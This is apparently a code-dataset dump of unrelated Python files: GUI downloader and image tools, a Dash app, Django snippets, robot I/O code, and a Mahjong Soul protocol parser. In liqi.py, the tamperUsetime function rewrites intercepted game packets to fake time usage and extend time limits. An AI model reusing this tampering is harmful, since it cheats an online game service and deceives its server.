nb = ttk.Notebook(ttframe)
nb.pack(side=LEFT, padx=(10, 0), expand=YES, fill=BOTH)
nb_text = "This is a notebook tab.\nYou can put any widget you want here."
nb.add(ttk.Label(nb, text=nb_text), text="Tab 1", sticky=NW)
nb.add(
child=ttk.Label(nb, text="A notebook tab."), text="Tab 2", sticky=NW
)
nb.add(ttk.Frame(nb), text="Tab 3")
nb.add(ttk.Frame(nb), text="Tab 4")
nb.add(ttk.Frame(nb), text="Tab 5")
# text widget
txt = ScrolledText(master=lframe, height=5, width=50, autohide=True)
txt.insert(END, ZEN)
txt.pack(side=LEFT, anchor=NW, pady=5, fill=BOTH, expand=YES)
lframe_inner = ttk.Frame(lframe)
lframe_inner.pack(fill=BOTH, expand=YES, padx=10)
s1 = ttk.Scale(
master=lframe_inner, orient=HORIZONTAL, value=75, from_=100, to=0
)
s1.pack(fill=X, pady=5, expand=YES)
ttk.Progressbar(
master=lframe_inner,
orient=HORIZONTAL,
value=50,
).pack(fill=X, pady=5, expand=YES)
ttk.Progressbar(
master=lframe_inner,
orient=HORIZONTAL,
value=75,
bootstyle=(SUCCESS, STRIPED),
).pack(fill=X, pady=5, expand=YES)
m = ttk.Meter(
master=lframe_inner,
metersize=150,
amountused=45,
subtext="meter widget",
bootstyle=INFO,
interactive=True,
)
m.pack(pady=10)
sb = ttk.Scrollbar(
master=lframe_inner,
orient=HORIZONTAL,
)
sb.set(0.1, 0.9)
sb.pack(fill=X, pady=5, expand=YES)
sb = ttk.Scrollbar(
master=lframe_inner, orient=HORIZONTAL, bootstyle=(DANGER, ROUND)
)
sb.set(0.1, 0.9)
sb.pack(fill=X, pady=5, expand=YES)
btn_group = ttk.Labelframe(master=rframe, text="Buttons", padding=(10, 5))
btn_group.pack(fill=X)
menu = ttk.Menu(root)
for i, t in enumerate(style.theme_names()):
menu.add_radiobutton(label=t, value=i)
default = ttk.Button(master=btn_group, text="solid button")
default.pack(fill=X, pady=5)
default.focus_set()
mb = ttk.Menubutton(
master=btn_group,
text="solid menubutton",
bootstyle=SECONDARY,
menu=menu,
)
mb.pack(fill=X, pady=5)
cb = ttk.Checkbutton(
master=btn_group,
text="solid toolbutton",
bootstyle=(SUCCESS, TOOLBUTTON),
)
cb.invoke()
cb.pack(fill=X, pady=5)
ob = ttk.Button(
master=btn_group,
text="outline button",
bootstyle=(INFO, OUTLINE),
command=lambda: Messagebox.ok("You pushed an outline button"),
)
ob.pack(fill=X, pady=5)
mb = ttk.Menubutton(
master=btn_group,
text="outline menubutton",
bootstyle=(WARNING, OUTLINE),
menu=menu,
)
mb.pack(fill=X, pady=5)
cb = ttk.Checkbutton(
master=btn_group,
text="outline toolbutton",
bootstyle=(SUCCESS, OUTLINE, TOOLBUTTON),
)
cb.pack(fill=X, pady=5)
lb = ttk.Button(master=btn_group, text="link button", bootstyle=LINK)
lb.pack(fill=X, pady=5)
cb1 = ttk.Checkbutton(
master=btn_group,
text="rounded toggle",
bootstyle=(SUCCESS, ROUND, TOGGLE),
)
cb1.invoke()
cb1.pack(fill=X, pady=5)
cb2 = ttk.Checkbutton(
master=btn_group, text="squared toggle", bootstyle=(SQUARE, TOGGLE)
)
cb2.pack(fill=X, pady=5)
cb2.invoke()
input_group = ttk.Labelframe(
master=rframe, text="Other input widgets", padding=10
)
input_group.pack(fill=BOTH, pady=(10, 5), expand=YES)
entry = ttk.Entry(input_group)
entry.pack(fill=X)
entry.insert(END, "entry widget")
password = ttk.Entry(master=input_group, show="•")
password.pack(fill=X, pady=5)
password.insert(END, "password")
spinbox = ttk.Spinbox(master=input_group, from_=0, to=100)
spinbox.pack(fill=X)
spinbox.set(45)
cbo = ttk.Combobox(
master=input_group,
text=style.theme.name,
values=theme_names,
exportselection=False,
)
cbo.pack(fill=X, pady=5)
cbo.current(theme_names.index(style.theme.name))
de = ttk.DateEntry(input_group)
de.pack(fill=X)
return root
if __name__ == "__main__":
app = ttk.Window("ttkbootstrap widget demo")
bagel = setup_demo(app)
bagel.pack(fill=BOTH, expand=YES)
app.mainloop()
``` |
{
"source": "745692208/ArtStationImageDownloader",
"score": 3
} |
#### File: ArtStationImageDownloader/src/app.py
```python
import os
import sys
import time
import webbrowser as web
from threading import Timer
from concurrent import futures
import tkinter as tk
import tkinter.ttk as ttk
from tkinter import messagebox, filedialog
import pyperclip # pip install pyperclip
import config
import core
class App:
class RepeatingTimer(Timer):
def run(self):
while not self.finished.is_set():
self.function(*self.args, **self.kwargs)
self.finished.wait(self.interval)
def set_perclip_text(self):
text = '剪切板:{}'.format(pyperclip.paste()[0:75])
self.perclip_text.set(text.replace('\n', '').replace('\r', ''))
def open_folder(self):
try:
os.startfile(self.entry_path.get())
except Exception:
messagebox.showerror("错误", "请输入正确的文件夹路径!")
def open_latest_folder(self):
path = self.cf.load('base', 'save_path')
if path != '':
try:
os.startfile(path)
except Exception:
messagebox.showerror("错误", "往期路径不存在!")
else:
messagebox.showinfo('无最新保存', '没有保存过作品!')
def browse(self):
print('browse')
dir = os.path.normpath(filedialog.askdirectory())
if dir != '.':
self.cf.save('base', 'path', dir)
self.save_path = dir
self.entry_path.delete(0, 'end')
self.entry_path.insert(0, self.save_path)
def run(self):
core.entry_path = self.entry_path.get()
core.b_is_create_folder = self.is_create_folder.get()
core.b_is_custom_name = self.is_custom_name.get()
self.cf.save('base', 'path', self.entry_path.get())
url = pyperclip.paste()
if 'youtube' in url:
self.core_u.down_youtube(url, '', self.entry_path.get())
elif 'bilibili' in url:
self.core_u.down_video(url, self.entry_path.get())
elif 'zbrushcentral' in url:
self.core_zb.b_is_down_video = self.is_down_video.get()
self.core_zb.get_work(url)
elif 'artstation' in url:
self.core_art.b_is_down_video = self.is_down_video.get()
if 'artwork' in url: # 判断是否为单个作品,否则为用户
self.core_art.get_work(url)
else:
self.core_art.get_user_works(url)
def create_widget(self):
menubar = tk.Menu(self.app)
assetWeb = tk.Menu(menubar)
assetWeb.add_command(
label='ArtStion',
command=lambda: web.open('https://www.artstation.com/'))
assetWeb.add_command(
label='ZBrushcentral',
command=lambda: web.open('https://www.zbrushcentral.com/'))
assetWeb.add_command(
label='YouTube',
command=lambda: web.open('https://www.youtube.com/'))
assetWeb.add_command(
label='BiliBili',
command=lambda: web.open('https://www.bilibili.com/'))
menubar.add_command(
label='关于',
command=lambda: web.open(
'https://github.com/745692208/MultipleDownloaders'))
menubar.add_cascade(label='资源网站', menu=assetWeb)
menubar.add_command(
label='使用帮助',
command=lambda: messagebox.showinfo(
'使用帮助', self.helpText))
self.app['menu'] = menubar
# 1 第一行 标签容器 创建标签
fTab = tk.Frame(self.app)
fTab.pack(side='top', fill='x')
# 2 第二行 save
fSave = tk.Frame(self.app)
fSave.pack(side='top', fill='x')
ttk.Label(fSave, text='Save Path').pack(side='left')
self.entry_path = ttk.Entry(fSave)
self.entry_path.pack(side='left', fill='x', expand=True)
self.entry_path.insert(0, self.save_path)
ttk.Button(fSave, text='浏览', command=self.browse).pack(side='left')
ttk.Button(fSave, text='打开文件夹', command=self.open_folder)\
.pack(side='left')
ttk.Button(
fSave, text='打开最近保存文件夹',
command=self.open_latest_folder)\
.pack(side='left')
fSave_2 = tk.Frame(self.app)
fSave_2.pack(side='top', fill='x')
self.is_custom_name = tk.IntVar()
self.is_custom_name.set(
self.cf.load('base', 'is_custom_name', 1))
ttk.Checkbutton(
fSave_2,
text='自定义命名',
variable=self.is_custom_name,
command=lambda: self.cf.save(
'base', 'is_custom_name',
str(self.is_custom_name.get())
)
).pack(side='left')
self.is_create_folder = tk.IntVar()
self.is_create_folder.set(
self.cf.load('base', 'is_create_folder', 1))
ttk.Checkbutton(
fSave_2,
text='创建文件夹',
variable=self.is_create_folder,
command=lambda: self.cf.save(
'base', 'is_create_folder',
str(self.is_create_folder.get())
)
).pack(side='left')
self.is_down_video = tk.IntVar()
self.is_down_video.set(self.cf.load(
'base', 'is_down_video', 1))
ttk.Checkbutton(
fSave_2,
text='下载视频',
variable=self.is_down_video,
command=lambda: self.cf.save(
'base', 'is_down_video',
str(self.is_down_video.get())
)
).pack(side='left')
ttk.Button(
fSave_2,
text='自动分析链接并爬取',
command=lambda: self.executor_ui.submit(
self.run)
).pack(side='left', fill='x', expand=1)
# 4 第四行 Logs界面
self.fLogs = ttk.LabelFrame(self.app, text='Logs')
self.fLogs.pack(side='top', fill='both', expand=1)
self.perclip_text = tk.StringVar()
ttk.Label(self.fLogs, anchor='w', textvariable=self.perclip_text)\
.pack(side='top', fill='x')
fLogs_box = ttk.Frame(self.fLogs)
fLogs_box.pack(side='left', fill='both', expand=1)
self.logs_box = tk.Text(fLogs_box)
self.logs_box.pack(side='left', fill='both', expand=1)
self.logs_box.configure(state="disabled")
self.logs_box.focus()
# Logs界面 滚动条
scrollbar = ttk.Scrollbar(fLogs_box)
scrollbar.pack(side='left', fill='y')
scrollbar.config(command=self.logs_box.yview)
self.logs_box.config(yscrollcommand=scrollbar.set)
def app_log(self, value):
time_date = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())
value = '[{}]{}'.format(time_date, value)
self.logs_box.configure(state="normal")
self.logs_box.insert('end', value + '\n')
self.logs_box.see('end')
self.logs_box.configure(state="disabled")
def __init__(self, title, ver, suffix):
self.helpText = '\1、网址复制到剪切板,会自动读取并分析和爬取资源。\
\n2、下载视频选项只影响A站和ZB站的资源爬取。\
\n3、目前支持A站、ZB站、B站的资源下载。'
self.cf = config.Config('MultipleDownloaders', 0, './test/')
core.cf = self.cf
core.Utils(self.app_log)
self.core_zb = core.ZBrush()
self.core_art = core.ArtStation()
self.core_u = core.Utils()
self.executor_ui = futures.ThreadPoolExecutor(1)
self.app = tk.Tk()
self.app.title('{} {} {}'.format(title, ver, suffix))
# 变量
self.ftab_list = []
self.save_path = self.cf.load('base', 'path')
self.tab_index = tk.IntVar()
self.tab_index.set(self.cf.load('base', 'tab_index', 0))
# 运行
self.create_widget()
# self.changeTab()
self.t = self.RepeatingTimer(1, self.set_perclip_text)
self.t.start()
if __name__ == '__main__':
app = App('Test', '', '')
app.app.mainloop()
app.t.cancel()
sys.exit()
``` |
{
"source": "745692208/ImageMergeTool",
"score": 3
} |
#### File: ImageMergeTool/src/ImageMergeTool.py
```python
from tkinter import ttk
from tkinter import filedialog, messagebox
import tkinter as tk
import webbrowser as web
import time
import sys
import os
import PIL.Image as Image
import config
class core:
def __init__(self):
self.cf = config.Config('', 1, '')
self.path = ''
self.image_format = ['.png', '.PNG', '.jpg', '.JPG']
def convert_image_path(self, image_path_list):
a = []
for str in image_path_list:
a.append(str.rsplit('/', 1)[1])
return a
def get_dir_images_path(self, path):
'''输出:yangchen0927-485gn2-1.jpg'''
try:
image_names = [
name for name in os.listdir(path) for item in self.image_format
if os.path.splitext(name)[1] == item
]
except Exception as e:
print("没有找到文件夹", e)
messagebox.showerror("错误", "请输入正确的文件夹路径")
return
return image_names
def merge_image(
self, path, images_path, name,
b_OkOpen, b_DelOldFile, b_create_folder, b_add_date):
# 防止没有图片或图片太少问题
if len(images_path) < 2:
messagebox.showerror("错误", "路径里没有合适的图片")
return
# 创建new文件夹并设置path
path = path + '\\'
save_path = path
if b_create_folder:
save_path = os.path.join(path, 'new\\')
os.makedirs(save_path, exist_ok=True)
# self.cf.save('base', 'latest_path', path)
print('最终路径', path)
# 新图片名字添加日期
if b_add_date:
time_date = time.strftime("%y-%m-%d")
name = '{}_{}.png'.format(name, time_date)
else:
name = '{}.png'.format(name)
# 合成图片
print(path + name)
image_num = len(images_path) # 获取总图片数量
image_size = Image.open(path + images_path[0]).size # 获取第一张图大小
new_image = Image.new(
'RGB', (image_size[0] * image_num, image_size[1])) # 创建一个新图
for i, image in enumerate(images_path):
image_obj = Image.open(path + image)
new_image.paste(image_obj, (i * image_size[0], 0))
new_image.save(save_path + name) # 保存图片,如:d:\asd\1.jpg
# 打开合并图片所在地
if b_OkOpen:
os.startfile(save_path)
# 删除旧文件
if b_DelOldFile:
for image in images_path:
os.remove(path + image)
class App:
def __init__(self, title, ver, suffix):
self.cf = config.Config(title, 0, './')
self.core = core()
self.core.cf = self.cf
# GUI
self.app = tk.Tk()
self.app.title('{} {} {}'.format(title, ver, suffix))
self.tab_index = tk.IntVar()
self.tab_index.set(self.cf.load('base', 'tab_index', 0))
self.entry_path = tk.StringVar()
self.entry_path.set(self.cf.load('base', 'entry_path'))
self.name = tk.StringVar()
self.name.set(self.cf.load('base', 'name', 'new'))
self.b_add_date = tk.IntVar()
self.b_add_date.set(self.cf.load('base', 'b_add_date', '1'))
self.b_DelOldFile = tk.IntVar()
self.b_DelOldFile.set(self.cf.load('base', 'b_DelOldFile', '0'))
self.b_OkOpen = tk.IntVar()
self.b_OkOpen.set(self.cf.load('base', 'b_OkOpen', '1'))
self.b_create_folder = tk.IntVar()
self.b_create_folder.set(self.cf.load('base', 'b_create_folder', '1'))
self.select_num_hint = tk.StringVar()
self.select_num_hint.set('共选择:0 张图片')
self.ftab_list = []
self.create_widget()
self.changeTab()
def merge_image(self, images, path):
self.core.merge_image(
path, images, self.name.get(),
self.b_OkOpen.get(), self.b_DelOldFile.get(),
self.b_create_folder.get(), self.b_add_date.get()
)
def run(self):
self.cf.save('base', 'entry_path', self.entry_path.get())
self.cf.save('base', 'name', self.name.get())
if self.tab_index.get() == 0:
images = self.core.convert_image_path(self.select_images)
self.merge_image(images, self.select_images[0].rsplit('/', 1)[0])
elif self.tab_index.get() == 1:
images = self.core.get_dir_images_path(self.entry_path.get())
self.merge_image(images, self.entry_path.get())
def check_menu(self):
web.open('https://github.com/745692208/ImageMergeTool')
def select_files(self):
files = filedialog.askopenfilenames(
title="Select Image file",
filetypes=(("Image", "*.png *.jpg"),)
)
self.select_images = files
self.select_num_hint.set('共选择:{} 张图片'.format(len(files)))
print(files)
def browse(self):
print('browse')
dir = os.path.normpath(filedialog.askdirectory())
if dir != '.':
self.cf.save('base', 'entry_path', dir)
self.entry_path.set(dir)
def open_folder(self):
try:
os.startfile(self.entry_path.get())
except Exception:
messagebox.showerror("错误", "请输入正确的文件夹路径!")
def changeTab(self):
index = self.tab_index.get()
self.cf.save('base', 'tab_index', str(index))
self.lf_option.pack_forget()
for ftab in self.ftab_list:
ftab.pack_forget()
self.ftab_list[index].pack(fill='x')
self.lf_option.pack(side='top', fill='x')
def create_widget(self):
# GUI初始化
menubar = tk.Menu(self.app)
menubar.add_command(label='关于', command=self.check_menu)
self.app['menu'] = menubar
# 1 第0行 标签容器 创建标签
fTab = tk.Frame(self.app)
fTab.pack(side='top', fill='x')
for i, name in enumerate(['选择图片', '选择文件夹']):
ttk.Radiobutton(
fTab, text=name, value=i,
variable=self.tab_index, command=self.changeTab)\
.pack(side='left')
# 第一行 内容
# 选择文件
lf_select = ttk.LabelFrame(self.app, text='Select Image')
lf_select.pack(side='top', fill='x')
self.ftab_list.append(lf_select)
tk.Label(lf_select, textvariable=self.select_num_hint, anchor='w')\
.pack(side='left', fill='x', expand=1)
ttk.Button(lf_select, text='选择文件', command=self.select_files)\
.pack(side='left')
# 路径
lf_path = ttk.LabelFrame(self.app, text='Path')
lf_path.pack(side='top', fill='x')
f_path = tk.Frame(lf_path)
f_path.pack(side='top', fill='x')
self.ftab_list.append(lf_path)
tk.Label(f_path, text='文件夹路径:').pack(side='left')
ttk.Entry(f_path, textvariable=self.entry_path, width=50)\
.pack(side='left', fill='x', expand=1)
ttk.Button(f_path, text='浏览', command=self.browse)\
.pack(side='left')
ttk.Button(lf_path, text='打开文件夹', command=self.open_folder)\
.pack(side='left', fill='x', expand=1)
# 第二行 选项
self.lf_option = ttk.LabelFrame(self.app, text='Option')
self.lf_option.pack(side='top', fill='x')
f_name = ttk.Frame(self.lf_option)
f_name.pack(side='top', fill='x')
tk.Label(f_name, text='Name:').pack(side='left')
ttk.Entry(f_name, textvariable=self.name)\
.pack(side='left', fill='x', expand=1)
ttk.Checkbutton(
f_name, text='添加日期', variable=self.b_add_date,
command=lambda: self.cf.save(
'base', 'b_add_date', self.b_add_date.get()))\
.pack(side='left')
lf_cb = tk.Frame(self.lf_option)
lf_cb.pack(side='top', fill='x')
ttk.Checkbutton(
lf_cb, text='删除旧文件', variable=self.b_DelOldFile,
command=lambda: self.cf.save(
'base', 'b_DelOldFile', self.b_DelOldFile.get()))\
.pack(side='left')
ttk.Checkbutton(
lf_cb, text='创建New文件夹', variable=self.b_create_folder,
command=lambda: self.cf.save(
'base', 'b_create_folder', self.b_create_folder.get()))\
.pack(side='left')
ttk.Checkbutton(
lf_cb, text='完成后打开文件夹', variable=self.b_OkOpen,
command=lambda: self.cf.save(
'base', 'b_OkOpen', self.b_OkOpen.get()))\
.pack(side='left')
lf_button = tk.Frame(self.lf_option)
lf_button.pack(side='top', fill='x')
# ttk.Button(lf_button, text='打开最后文件夹').pack(side='left')
ttk.Button(lf_button, text='合并', command=self.run)\
.pack(side='left', fill='both', expand=1)
if __name__ == '__main__':
app = App('ImageMergeTool', '2.0.1', '')
app.app.mainloop()
app.app.quit()
sys.exit()
``` |
{
"source": "747470666/mouxiu",
"score": 2
} |
#### File: 747470666/mouxiu/app.py
```python
from dash import dcc
from dash import html
from dash.dependencies import Input, Output
# ==============================================================
# app的初始化,自动引入assets中的所有资源
from core import app
# 引入自定义框架及组件
from tools.structure import PageStruct
import tools.router as router
# ==============================================================
# 初始化
# 页面结构初始化
# 开关 switch: on/off
# 默认样式 style: string (可以自己设计样式)
mySetting = {
'main': 'simple',
'head': {
'style': 'simple',
},
'body': {
'style': 'simple',
},
'foot': {
'style': 'simple',
},
}
# 结构初始化
page_struct = PageStruct(mySetting)
# ==============================================================
# app入口
app.layout = html.Div(id='app', className=mySetting['main'], children=[
dcc.Location(id='url', refresh=False),
html.Meta(name='viewport', content="initial-scale=1.0, minimum-scale=0.5, maximum-scale=2.0, user-scalable=yes"),
html.Div(id='page')
])
# ==============================================================
# 定义router响应回调
@app.callback(Output('page', 'children'),
Input('url', 'pathname'))
def display_page(pathname):
return router.route_page(pathname)
server = app.server
# ==============================================================
# 主函数运行
if __name__ == '__main__':
# app.run_server(debug=True)
app.run_server(debug=False)
```
#### File: mouxiu/tools/router_setting.py
```python
from src.pages.index import index_page
from src.pages.research import research_page
from src.pages.about import about_page
# 这里在下面利用了一个双向指向的字典,因此不要有重复的变量名
pathname_setting = ['/', '/research', '/about']
pagename_setting = ['主页', '研究', '关于']
tab_dict = {}
tab_id = []
for i in range(len(pathname_setting)):
tab_id.append('page' + str(i))
# 正反都映射好
tab_dict[pathname_setting[i]] = tab_id[i]
tab_dict[tab_id[i]] = pathname_setting[i]
def get_router_setting():
return pathname_setting, pagename_setting, tab_id, tab_dict
page_index_dict = {}
for i in range(len(pathname_setting)):
page_index_dict['page' + str(i)] = i
def get_router_page(style, page_index):
pages_list = [
index_page(style), research_page(style), about_page(style)
]
return pages_list[page_index_dict[page_index]]
``` |
{
"source": "747929791/majsoul_wrapper",
"score": 2
} |
#### File: 747929791/majsoul_wrapper/liqi.py
```python
import os
import sys
import time
import json
import struct
import pickle
import random
import argparse
from xmlrpc.client import ServerProxy
import base64
from enum import Enum
import importlib
from typing import List, Tuple, Dict
from google.protobuf.json_format import MessageToDict
try:
from .proto import liqi_pb2 as pb
except:
from proto import liqi_pb2 as pb
class MsgType(Enum):
Notify = 1
Req = 2
Res = 3
class LiqiProto:
def __init__(self):
#解析一局的WS消息队列
self.tot = 0 # 当前总共解析的包数量
# (method_name:str,pb.MethodObj) for 256 sliding windows; req->res
self.res_type = dict() # int -> (method_name,pb2obj)
self.jsonProto = json.load(
open(os.path.join(os.path.dirname(__file__), 'proto/liqi.json'), 'r'))
def init(self):
self.tot = 0
self.res_type.clear()
def parse(self, flow_msg) -> bool:
#parse一帧WS flow msg,要求按顺序parse
buf = flow_msg.content
from_client = flow_msg.from_client
result = dict()
msg_type = MsgType(buf[0]) # 通信报文类型
if msg_type == MsgType.Notify:
msg_block = fromProtobuf(buf[1:]) # 解析剩余报文结构
method_name = msg_block[0]['data'].decode()
"""
msg_block结构通常为
[{'id': 1, 'type': 'string', 'data': b'.lq.ActionPrototype'},
{'id': 2, 'type': 'string','data': b'protobuf_bytes'}]
"""
_, lq, message_name = method_name.split('.')
liqi_pb2_notify = getattr(pb, message_name)
proto_obj = liqi_pb2_notify.FromString(msg_block[1]['data'])
dict_obj = MessageToDict(proto_obj)
if 'data' in dict_obj:
B = base64.b64decode(dict_obj['data'])
action_proto_obj = getattr(pb, dict_obj['name']).FromString(B)
action_dict_obj = MessageToDict(action_proto_obj)
dict_obj['data'] = action_dict_obj
msg_id = self.tot
else:
msg_id = struct.unpack('<H', buf[1:3])[0] # 小端序解析报文编号(0~255)
msg_block = fromProtobuf(buf[3:]) # 解析剩余报文结构
"""
msg_block结构通常为
[{'id': 1, 'type': 'string', 'data': b'.lq.FastTest.authGame'},
{'id': 2, 'type': 'string','data': b'protobuf_bytes'}]
"""
if msg_type == MsgType.Req:
assert(msg_id < 1 << 16)
assert(len(msg_block) == 2)
assert(msg_id not in self.res_type)
method_name = msg_block[0]['data'].decode()
_, lq, service, rpc = method_name.split('.')
proto_domain = self.jsonProto['nested'][lq]['nested'][service]['methods'][rpc]
liqi_pb2_req = getattr(pb, proto_domain['requestType'])
proto_obj = liqi_pb2_req.FromString(msg_block[1]['data'])
dict_obj = MessageToDict(proto_obj)
self.res_type[msg_id] = (method_name, getattr(
pb, proto_domain['responseType'])) # wait response
elif msg_type == MsgType.Res:
assert(len(msg_block[0]['data']) == 0)
assert(msg_id in self.res_type)
method_name, liqi_pb2_res = self.res_type.pop(msg_id)
proto_obj = liqi_pb2_res.FromString(msg_block[1]['data'])
dict_obj = MessageToDict(proto_obj)
result = {'id': msg_id, 'type': msg_type,
'method': method_name, 'data': dict_obj}
self.tot += 1
return result
def tamperUsetime(flow_msg) -> bool:
"""
If flow_msg is a '.lq.FastTest.inputOperation' and
have a 'timeuse' domain, change it to a random number in 1-4
for extending the time limit of the server to the client.
Return whether the data has been tampered.
"""
def getById(A, id):
for d in A:
if d['id'] == id:
return d
return None
buf = flow_msg.content
from_client = flow_msg.from_client
result = dict()
msg_type = MsgType(buf[0]) # 通信报文类型
if msg_type == MsgType.Notify:
L0 = fromProtobuf(buf[1:]) # 解析剩余报文结构
assert(toProtobuf(L0) == buf[1:])
method_name = L0[0]['data'].decode()
if method_name == '.lq.ActionPrototype':
_, lq, message_name = method_name.split('.')
liqi_pb2_notify = getattr(pb, message_name)
L1 = fromProtobuf(L0[1]['data'])
assert(toProtobuf(L1) == L0[1]['data'])
action_name = L1[1]['data'].decode()
if action_name == 'ActionDealTile':
L2 = fromProtobuf(L1[2]['data'])
assert(toProtobuf(L2) == L1[2]['data'])
d3 = getById(L2, 4)
if d3 != None:
L3 = fromProtobuf(d3['data'])
if getById(L3, 5) != None:
d4 = getById(L3, 4)
if d4 != None:
x = 1+L0[1]['begin']+2+L1[2]['begin'] + \
2+d3['begin']+2+d4['begin']+1
old_value, p = parseVarint(buf, x)
if old_value < 20000:
d4['data'] = 20000
else:
old_value = 0
L3.append(
{'id': 4, 'type': 'varint', 'data': 20000})
L3 = sorted(L3, key=lambda x: x['id'])
print('[TamperTimeAdd] from', old_value, 'to', 20000)
d3['data'] = toProtobuf(L3)
L1[2]['data'] = toProtobuf(L2)
L0[1]['data'] = toProtobuf(L1)
flow_msg.content = buf[0:1]+toProtobuf(L0)
return True
elif msg_type == MsgType.Req:
msg_id = struct.unpack('<H', buf[1:3])[0]
msg_block = fromProtobuf(buf[3:])
method_name = msg_block[0]['data'].decode()
if method_name == '.lq.FastTest.inputOperation':
data_block = fromProtobuf(msg_block[1]['data'])
x = None
for d in data_block:
if d['id'] == 6:
x = 3+msg_block[1]['begin']+2+d['begin']+1
if x == None or buf[x] < 5:
return False
new_usetime = int(random.randint(1, 4)).to_bytes(1, 'little')
print('[TamperUseTime] from', int(buf[x]), 'to', new_usetime)
flow_msg.content = buf[:x]+new_usetime+buf[x+1:]
return True
return False
def toVarint(x: int) -> bytes:
data = 0
base = 0
length = 0
if x == 0:
return b'\x00'
while(x > 0):
length += 1
data += (x & 127) << base
x >>= 7
if x > 0:
data += 1 << (base+7)
base += 8
return data.to_bytes(length, 'little')
def parseVarint(buf, p):
# parse a varint from protobuf
data = 0
base = 0
while(p < len(buf)):
data += (buf[p] & 127) << base
base += 7
p += 1
if buf[p-1] >> 7 == 0:
break
return (data, p)
def fromProtobuf(buf) -> List[Dict]:
"""
dump the struct of protobuf,观察报文结构
buf: protobuf bytes
"""
p = 0
result = []
while(p < len(buf)):
block_begin = p
block_type = (buf[p] & 7)
block_id = buf[p] >> 3
p += 1
if block_type == 0:
#varint
block_type = 'varint'
data, p = parseVarint(buf, p)
elif block_type == 2:
#string
block_type = 'string'
s_len, p = parseVarint(buf, p)
data = buf[p:p+s_len]
p += s_len
else:
raise Exception('unknow type:', block_type, ' at', p)
result.append({'id': block_id, 'type': block_type,
'data': data, 'begin': block_begin})
return result
def toProtobuf(data: List[Dict]) -> bytes:
"""
Inverse operation of 'fromProtobuf'
"""
result = b''
for d in data:
if d['type'] == 'varint':
result += ((d['id'] << 3)+0).to_bytes(length=1, byteorder='little')
result += toVarint(d['data'])
elif d['type'] == 'string':
result += ((d['id'] << 3)+2).to_bytes(length=1, byteorder='little')
result += toVarint(len(d['data']))
result += d['data']
else:
raise NotImplementedError
return result
def dumpWebSocket(filename='ws_dump.pkl'):
server = ServerProxy("http://127.0.0.1:37247") # 初始化服务器
liqi = LiqiProto()
tot = 0
history_msg = []
while True:
n = server.get_len()
if tot < n:
flow = pickle.loads(server.get_items(tot, n).data)
for flow_msg in flow:
result = liqi.parse(flow_msg)
print(result)
print('-'*65)
#packet = flow_msg.content
#from_client = flow_msg.from_client
#print("[" + ("Sended" if from_client else "Reveived") +
# "]: decode the packet here: %r…" % packet)
tot += 1
history_msg = history_msg+flow
path = filename
pickle.dump(history_msg, open(path, 'wb'))
time.sleep(0.2)
def replayWebSocket(filename='ws_dump.pkl'):
path = filename
history_msg = pickle.load(open(path, 'rb'))
liqi = LiqiProto()
for flow_msg in history_msg:
result = liqi.parse(flow_msg)
print(result)
print('-'*65)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description="Demo of Liqi Proto")
parser.add_argument('-d', '--dump', default='')
parser.add_argument('-l', '--load', default='')
args = parser.parse_args()
if args.dump != '':
dumpWebSocket(args.dump)
elif args.load != '':
replayWebSocket(args.load)
else:
print('Instruction not supported.')
print('Use "python -m majsoul_wrapper.liqi --dump FILE"')
print(' or "python -m majsoul_wrapper.liqi --load FILE"')
``` |
{
"source": "74gigi8/Learning-Path-Learn-Web-Development-with-Python",
"score": 3
} |
#### File: src/extras/coroutine.py
```python
import asyncio
async def sleeper_coroutine():
await asyncio.sleep(5)
if __name__ == '__main__':
loop = asyncio.get_event_loop()
loop.run_until_complete(sleeper_coroutine())
```
#### File: src/formschapter/models.py
```python
from django.db import models
from django.urls import reverse
class ImportantDate(models.Model):
date = models.DateField()
desc = models.CharField(max_length=100)
def __str__(self):
return "{} - {}".format(self.date, self.desc)
def get_absolute_url(self):
return reverse('formschapter:impdate_detail', args=[str(self.pk)])
class Meta:
ordering = ('-date',)
```
#### File: src/viewschapter/mro.py
```python
class A:
def do(self):
print("A")
class B:
def do(self):
print("B")
class BA(B, A):
pass
class AB(A, B):
pass
BA().do() # Prints B
AB().do() # Prints A
print(AB.__mro__)
```
#### File: src/viewschapter/serializers.py
```python
from rest_framework import serializers
from posts import models
class PostSerializer(serializers.ModelSerializer):
posted_by = serializers.SerializerMethodField()
def get_posted_by(self, obj):
return obj.posted_by.username
class Meta:
model = models.Post
fields = ("posted_by", "message",)
``` |
{
"source": "74ls04/StackMod",
"score": 3
} |
#### File: python/src/StackModIO.py
```python
from __future__ import division
import logging
import time
import math
import sys
log = logging.getLogger(__name__)
I2C_MASTER_ADDRESS = 0x70
START = '{'
END = '}'
MOTOR = 0x32
exponential_deadband = .25
exponential_sensitivity = 1
class StackModIO(object):
"""Modbot Protocol Python Implementation"""
smoothing_size = 10
x_array = [0]*smoothing_size
x_index = 0
x_total = 0
x_average = 0
y_array = [0]*smoothing_size
y_index = 0
y_total = 0
y_average = 0
def __init__(self, address, i2c=None, **kwargs):
# Setup I2C interface for the device.
if i2c is None:
import Adafruit_GPIO.I2C as I2C
i2c = I2C
self._device = i2c.get_i2c_device(address, **kwargs)
self.address = address
def joystick_to_diff(self, x, y, minJoystick, maxJoystick, minSpeed, maxSpeed):
# If x and y are 0, then there is not much to calculate...
if x == 0 and y == 0:
return (0, 0)
# First Compute the angle in deg
# First hypotenuse
z = math.sqrt(x * x + y * y)
# angle in radians
rad = math.acos(math.fabs(x) / z)
# and in degrees
angle = rad * 180 / math.pi
# Now angle indicates the measure of turn
# Along a straight line, with an angle o, the turn co-efficient is same
# this applies for angles between 0-90, with angle 0 the coeff is -1
# with angle 45, the co-efficient is 0 and with angle 90, it is 1
tcoeff = -1 + (angle / 90) * 2
turn = tcoeff * math.fabs(math.fabs(y) - math.fabs(x))
turn = round(turn * 100, 0) / 100
# And max of y or x is the movement
mov = max(math.fabs(y), math.fabs(x))
# First and third quadrant
if (x >= 0 and y >= 0) or (x < 0 and y < 0):
rawLeft = mov
rawRight = turn
else:
rawRight = mov
rawLeft = turn
# Reverse polarity
if y < 0:
rawLeft = 0 - rawLeft
rawRight = 0 - rawRight
# minJoystick, maxJoystick, minSpeed, maxSpeed
# Map the values onto the defined rang
rightOut = self.map(rawRight, minJoystick, maxJoystick, minSpeed, maxSpeed)
leftOut = self.map(rawLeft, minJoystick, maxJoystick, minSpeed, maxSpeed)
return int(rightOut), int(leftOut)
@staticmethod
def map(v, in_min, in_max, out_min, out_max):
# Check that the value is at least in_min
